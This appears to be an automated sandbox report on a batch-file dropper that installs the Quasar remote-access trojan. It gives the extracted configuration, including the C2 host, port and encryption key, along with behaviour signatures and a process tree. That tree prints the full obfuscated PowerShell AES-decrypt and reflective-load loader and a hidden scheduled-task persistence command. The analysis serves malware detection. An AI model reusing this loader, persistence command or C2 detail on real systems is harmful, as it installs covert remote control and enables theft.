Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
10-06-2024 14:58
General
-
Target
API_Connector.bat
-
Size
586KB
-
MD5
54b83bd573c13cd414255d487f47b770
-
SHA1
f35b29215c9039af7294b1e9db7977447f380cbe
-
SHA256
fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926
-
SHA512
8c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9
-
SSDEEP
12288:LiR+aj62WqH39ttfD1KhLZ6azySThfOwppoCQ/gcOhKrYFuuZUDGO0:mQt2WwxGJtvpOt/owriUDt0
Score
10/10
Malware Config
Extracted
Family
quasar
Version
1.3.0.0
Botnet
Slave
C2
runderscore00-61208.portmap.host:61208
Mutex
QSR_MUTEX_cq1PvE2FSZsrtLytho
Attributes
-
encryption_key
5vXgZSbIpHJzAn3ZrosQ
-
install_name
$phantom-powershell.exe
-
log_directory
$phantom-Logs
-
reconnect_delay
3000
-
startup_key
Powershell
-
subdirectory
$phantom-zero
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 62 IoCs
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\API_Connector.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Local\Temp\API_Connector.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_57_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcsytksq.twb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.batFilesize
586KB
MD554b83bd573c13cd414255d487f47b770
SHA1f35b29215c9039af7294b1e9db7977447f380cbe
SHA256fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926
SHA5128c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbsFilesize
123B
MD5065cc72718daae804e5bea6753652a33
SHA13243bf10760303cc68da17673be2d2bc9565b464
SHA256a49fed4eedf27903821b907776260c8567fd1de66c84689a53a4b55484c87cb7
SHA512c237f5d45c75b687fd4dc737617f278639f88671893613e077778cc9210ee0521f17d61c12216c9bfc39de3510241ad33755ff64fa5b37813971225126086326
-
memory/880-27-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/880-30-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/880-17-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/880-18-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/932-110-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1124-111-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1196-108-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1252-103-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1296-100-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1352-107-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1560-105-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1652-101-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/1948-104-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/2284-99-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/2532-102-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/2844-97-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/3200-96-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/3200-47-0x00000000063A0000-0x00000000063CA000-memory.dmpFilesize
168KB
-
memory/3348-145-0x0000027A6A130000-0x0000027A6A142000-memory.dmpFilesize
72KB
-
memory/3348-144-0x0000027A6A0A0000-0x0000027A6A0FE000-memory.dmpFilesize
376KB
-
memory/3376-109-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/3404-98-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/3720-106-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmpFilesize
64KB
-
memory/4012-11-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/4012-9-0x0000023F97FF0000-0x0000023F98012000-memory.dmpFilesize
136KB
-
memory/4012-10-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/4012-0-0x00007FF991AE3000-0x00007FF991AE5000-memory.dmpFilesize
8KB
-
memory/4012-95-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/4012-12-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmpFilesize
10.8MB
-
memory/4012-13-0x0000023FB05D0000-0x0000023FB0616000-memory.dmpFilesize
280KB
-
memory/4012-14-0x0000023FB0360000-0x0000023FB0368000-memory.dmpFilesize
32KB
-
memory/4012-15-0x0000023FB0620000-0x0000023FB0690000-memory.dmpFilesize
448KB